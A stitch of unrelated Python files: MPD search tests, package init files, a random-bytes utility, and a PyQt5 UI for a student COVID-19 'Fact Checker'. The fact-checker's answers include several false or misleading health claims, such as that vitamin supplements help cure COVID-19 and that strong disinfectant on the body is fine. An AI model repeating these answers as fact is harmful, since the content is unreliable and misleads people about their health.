self.sendRequest(u'search "album" "analbum"')
self.assertInResponse(u'OK')
def test_search_album_without_quotes(self):
self.sendRequest(u'search album "analbum"')
self.assertInResponse(u'OK')
def test_search_artist(self):
self.sendRequest(u'search "artist" "anartist"')
self.assertInResponse(u'OK')
def test_search_artist_without_quotes(self):
self.sendRequest(u'search artist "anartist"')
self.assertInResponse(u'OK')
def test_search_filename(self):
self.sendRequest(u'search "filename" "afilename"')
self.assertInResponse(u'OK')
def test_search_filename_without_quotes(self):
self.sendRequest(u'search filename "afilename"')
self.assertInResponse(u'OK')
def test_search_title(self):
self.sendRequest(u'search "title" "atitle"')
self.assertInResponse(u'OK')
def test_search_title_without_quotes(self):
self.sendRequest(u'search title "atitle"')
self.assertInResponse(u'OK')
def test_search_any(self):
self.sendRequest(u'search "any" "anything"')
self.assertInResponse(u'OK')
def test_search_any_without_quotes(self):
self.sendRequest(u'search any "anything"')
self.assertInResponse(u'OK')
def test_search_date(self):
self.sendRequest(u'search "date" "2002-01-01"')
self.assertInResponse(u'OK')
def test_search_date_without_quotes(self):
self.sendRequest(u'search date "2002-01-01"')
self.assertInResponse(u'OK')
def test_search_date_with_capital_d_and_incomplete_date(self):
self.sendRequest(u'search Date "2005"')
self.assertInResponse(u'OK')
def test_search_else_should_fail(self):
self.sendRequest(u'search "sometype" "something"')
self.assertEqualResponse(u'ACK [2@0] {search} incorrect arguments')
# File: drawBot/context/dummyContext.py (musca1997/drawbot, BSD-2-Clause)
from __future__ import absolute_import, print_function
from .baseContext import BaseContext
class DummyContext(BaseContext):
pass
# File: candphy/__init__.py (perseu912/candphy, MIT)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
####################
#### Reinan Br. ####
## 02/11/21 23:51 ##
##### candphy ######
####################
from .logs import log,show_console
# File: xoodyak/pyxoodyak/utils.py (rishubn/bluelight, Apache-2.0)
import random

def rand_bytes(n: int) -> bytes:
    """Return n pseudo-random bytes.

    Note: the random module is not cryptographically secure; this is fine
    for generating test vectors, but real keys should use the secrets module.
    """
    return bytes(random.getrandbits(8) for _ in range(n))
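
# Illustrative usage (not part of the original module): 16 pseudo-random
# bytes printed as hex, next to the stdlib `secrets.token_bytes` alternative
# for when cryptographic strength is required.
import secrets
print(rand_bytes(16).hex())           # e.g. 'd41d8c...' (varies per run)
print(secrets.token_bytes(16).hex())  # cryptographically strong variant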
# File: gacha/utils/__init__.py (rexor12/gacha, MIT)
from .dict_utils import get_or_add
from .float_utils import isclose
# File: scrapper/steam/__init__.py (gghf-service/gghf-api, MIT)
from scrapper.steam.spider import main
# File: Pandemic Warrior/main/Fact_Checker_gui.py (varunkm192002/Pandemic-Warrior, BSD-3-Clause)
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Akshita_02.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(970, 540)
Form.setStyleSheet("")
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.frame = QtWidgets.QFrame(Form)
self.frame.setStyleSheet("QFrame{\n"
" \n"
"background:#333;\n"
"\n"
"\n"
" border:2px;\n"
" border-radius:30px;\n"
" \n"
"}\n"
"\n"
"/* VERTICAL SCROLLBAR */\n"
" QScrollBar:vertical {\n"
" border: none; \n"
" background-color: rgb(61, 56, 70);\n"
" width: 14px;\n"
" margin: 15px 0 15px 0;\n"
" border-radius: 0px;\n"
" }\n"
"\n"
"/* HANDLE BAR VERTICAL */\n"
"QScrollBar::handle:vertical { \n"
" background-color: rgb(190, 190, 190);\n"
" min-height: 30px;\n"
" border-radius: 7px;\n"
"}\n"
"QScrollBar::handle:vertical:hover{ \n"
" \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"QScrollBar::handle:vertical:pressed { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"\n"
"/* BTN TOP - SCROLLBAR */\n"
"QScrollBar::sub-line:vertical {\n"
" border: none;\n"
" background-color: rgb(200, 200, 200);\n"
" height: 15px;\n"
" border-top-left-radius: 7px;\n"
" border-top-right-radius: 7px;\n"
" subcontrol-position: top;\n"
" subcontrol-origin: margin;\n"
"}\n"
"QScrollBar::sub-line:vertical:hover { \n"
" background-color: rgb(255, 0, 127);\n"
"}\n"
"QScrollBar::sub-line:vertical:pressed { \n"
" background-color: rgb(185, 0, 92);\n"
"}\n"
"\n"
"/* BTN BOTTOM - SCROLLBAR */\n"
"QScrollBar::add-line:vertical {\n"
" border: none;\n"
" background-color: rgb(200, 200, 200);\n"
" height: 15px;\n"
" border-bottom-left-radius: 7px;\n"
" border-bottom-right-radius: 7px;\n"
" subcontrol-position: bottom;\n"
" subcontrol-origin: margin;\n"
"}\n"
"QScrollBar::add-line:vertical:hover { \n"
" background-color: rgb(255, 0, 127);\n"
"}\n"
"QScrollBar::add-line:vertical:pressed { \n"
" background-color: rgb(185, 0, 92);\n"
"}\n"
"\n"
"/* RESET ARROW */\n"
"QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {\n"
" background: none;\n"
"}\n"
"QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\n"
" background: none;\n"
"}\n"
"\n"
"/* HORIZONTAL SCROLLBAR */\n"
" QScrollBar:horizontal {\n"
" border: none; \n"
" background-color: rgb(61, 56, 70);\n"
" height: 14px;\n"
" margin: 0px 15px 0px 15px;\n"
" border-radius: 0px;\n"
" }\n"
"\n"
"/* HANDLE BAR HORIZONTAL */\n"
"QScrollBar::handle:horizontal { \n"
" background-color: rgb(190, 190, 190);\n"
" min-width: 30px;\n"
" border-radius: 7px;\n"
"}\n"
"QScrollBar::handle:horizontal:hover{ \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"QScrollBar::handle:horizontal:pressed { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"\n"
"/* BTN TOP - SCROLLBAR */\n"
"QScrollBar::sub-line:horizontal {\n"
" border: none;\n"
" background-color: rgb(200, 200, 200);\n"
" width: 15px;\n"
" border-top-left-radius: 7px;\n"
" border-top-right-radius: 7px;\n"
" subcontrol-position: left;\n"
" subcontrol-origin: margin;\n"
"}\n"
"QScrollBar::sub-line:horizontal:hover { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"QScrollBar::sub-line:horizontal:pressed { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"\n"
"/* BTN BOTTOM - SCROLLBAR */\n"
"QScrollBar::add-line:horizontal{\n"
" border: none;\n"
" background-color: rgb(200, 200, 200);\n"
" width: 15px;\n"
" border-bottom-left-radius: 7px;\n"
" border-bottom-right-radius: 7px;\n"
" subcontrol-position: right;\n"
" subcontrol-origin: margin;\n"
"}\n"
"QScrollBar::add-line:horizontal:hover { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"QScrollBar::add-line:horizontal:pressed { \n"
" background-color: rgb(238, 255, 145);\n"
"}\n"
"\n"
"/* RESET ARROW */\n"
"QScrollBar::up-arrow:horizontal, QScrollBar::down-arrow:horizontal {\n"
" background: none;\n"
"}\n"
"QScrollBar::add-page:horizontal, QScrollBar::sub-page:horizontal {\n"
" background: none;\n"
"}\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"")
self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame.setFrameShadow(QtWidgets.QFrame.Plain)
self.frame.setLineWidth(0)
self.frame.setMidLineWidth(0)
self.frame.setObjectName("frame")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setContentsMargins(1, 3, 5, -1)
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.btn_minimize_3 = QtWidgets.QPushButton(self.frame)
self.btn_minimize_3.setMinimumSize(QtCore.QSize(16, 16))
self.btn_minimize_3.setMaximumSize(QtCore.QSize(17, 17))
self.btn_minimize_3.setStyleSheet("QPushButton {\n"
" border: none;\n"
" border-radius: 8px; \n"
" background-color: rgb(255, 170, 0);\n"
"}\n"
"QPushButton:hover { \n"
" background-color: rgba(255, 170, 0, 150);\n"
"}")
self.btn_minimize_3.setText("")
self.btn_minimize_3.setObjectName("btn_minimize_3")
self.horizontalLayout.addWidget(self.btn_minimize_3)
self.btn_close_3 = QtWidgets.QPushButton(self.frame)
self.btn_close_3.setMinimumSize(QtCore.QSize(16, 16))
self.btn_close_3.setMaximumSize(QtCore.QSize(17, 17))
self.btn_close_3.setStyleSheet("QPushButton {\n"
" border: none;\n"
" border-radius: 8px; \n"
" background-color: rgb(255, 0, 0);\n"
"}\n"
"QPushButton:hover { \n"
" background-color: rgba(255, 0, 0, 150);\n"
"}")
self.btn_close_3.setText("")
self.btn_close_3.setObjectName("btn_close_3")
self.horizontalLayout.addWidget(self.btn_close_3)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.frame_2 = QtWidgets.QFrame(self.frame)
self.frame_2.setFrameShape(QtWidgets.QFrame.NoFrame)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName("frame_2")
self.gridLayout = QtWidgets.QGridLayout(self.frame_2)
self.gridLayout.setContentsMargins(11, 9, 8, -1)
self.gridLayout.setSpacing(6)
self.gridLayout.setObjectName("gridLayout")
self.textEdit = QtWidgets.QTextEdit(self.frame_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.textEdit.sizePolicy().hasHeightForWidth())
self.textEdit.setSizePolicy(sizePolicy)
self.textEdit.setMinimumSize(QtCore.QSize(938, 480))
font = QtGui.QFont()
font.setFamily("URW Bookman [urw]")
self.textEdit.setFont(font)
self.textEdit.setStyleSheet("")
self.textEdit.setFrameShape(QtWidgets.QFrame.NoFrame)
self.textEdit.setFrameShadow(QtWidgets.QFrame.Raised)
self.textEdit.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
self.textEdit.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
self.textEdit.setLineWrapMode(QtWidgets.QTextEdit.NoWrap)
self.textEdit.setObjectName("textEdit")
self.gridLayout.addWidget(self.textEdit, 0, 0, 1, 1)
self.verticalLayout_2.addWidget(self.frame_2)
self.verticalLayout.addWidget(self.frame)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.btn_minimize_3.setToolTip(_translate("Form", "Minimize"))
self.btn_close_3.setToolTip(_translate("Form", "Close"))
self.textEdit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'URW Bookman [urw]\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"center\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:26pt; font-weight:600; font-style:italic; color:#ffffff;\">Fact Checker</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">1. Will most people who get COVID-19 get very sick or die?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes most of the people got sick but it is not necessary they will die.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">2. Can you always tell if someone has COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No, many times there can be asymptomatic disease.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">3. Does COVID-19 only affect rich people?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->False.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">4. Does COVID-19 only affect poor people?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->False.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">5. Does COVID-19 only affect old people, meaning young people don’t have to worry?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No, the latest strains of virus affect all age groups.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">6. Are people living with HIV more likely to get seriously ill?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">--> Yes, because HIV directly affects your immune system.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">7. Are the COVID-19 vaccines safe?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, they are safe.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">8. Are the drugs used in antiretroviral treatment for HIV effective against COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">9. Are anti-malaria drugs effective against COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">10. Can COVID-19 be passed on in warm sunny weather?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">--> Yes, it can pass at temp below 70 degrees.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">11. Can hot drinks stop COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->The Centre stated the fact that it does not kill the virus nor does it cure the disease. It added that a temperature of 60-75 degrees is required in lab settings to kill the coronavirus.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">12. Does COVID-19 only happens due to cold drinks?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->There is no conection between cold drinks and covid at all.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">13. Should I use a strong disinfectant to clean my hands and body to protect myself from COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, one can use strong disinfectants but in proportion.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">14. Can drinking alcohol cure or prevent COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Drinking alcohol is dangerous to health and doesn\'t cure covid.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">15. Is It safer to frequently clean your hands and not wear gloves?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->You should clear your hands frequently and also wear gloves.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">16. Does Touching a communal bottle of alcohol-based sanitizer will not infect you?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, there is a possiblity of infection.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">17. Does The amount of alcohol-based sanitizer you use matters?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->No, the amount of alcohol is as per guildlines in sanitizers.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">18. Does Clinical trials confirm that hydroxychloroquine does not prevent illness or death from COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes , it doesn\'t prevent. it is more effective for malaria.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">19. Can Vitamin and mineral supplements cure COVID-19?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->Yes, they help in curing covid. But should be taken with doctor\'s advice.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">20. Is dexamethasone a treatment for all COVID-19 patients?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->It is only used for critically ill people.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">21. Should People NOT wear masks while exercising?</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\">-->We should always wear mask even if we are doing any job.</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'Garuda\'; font-size:14pt; font-style:italic; color:#ffffff;\"><br /></p>\n"
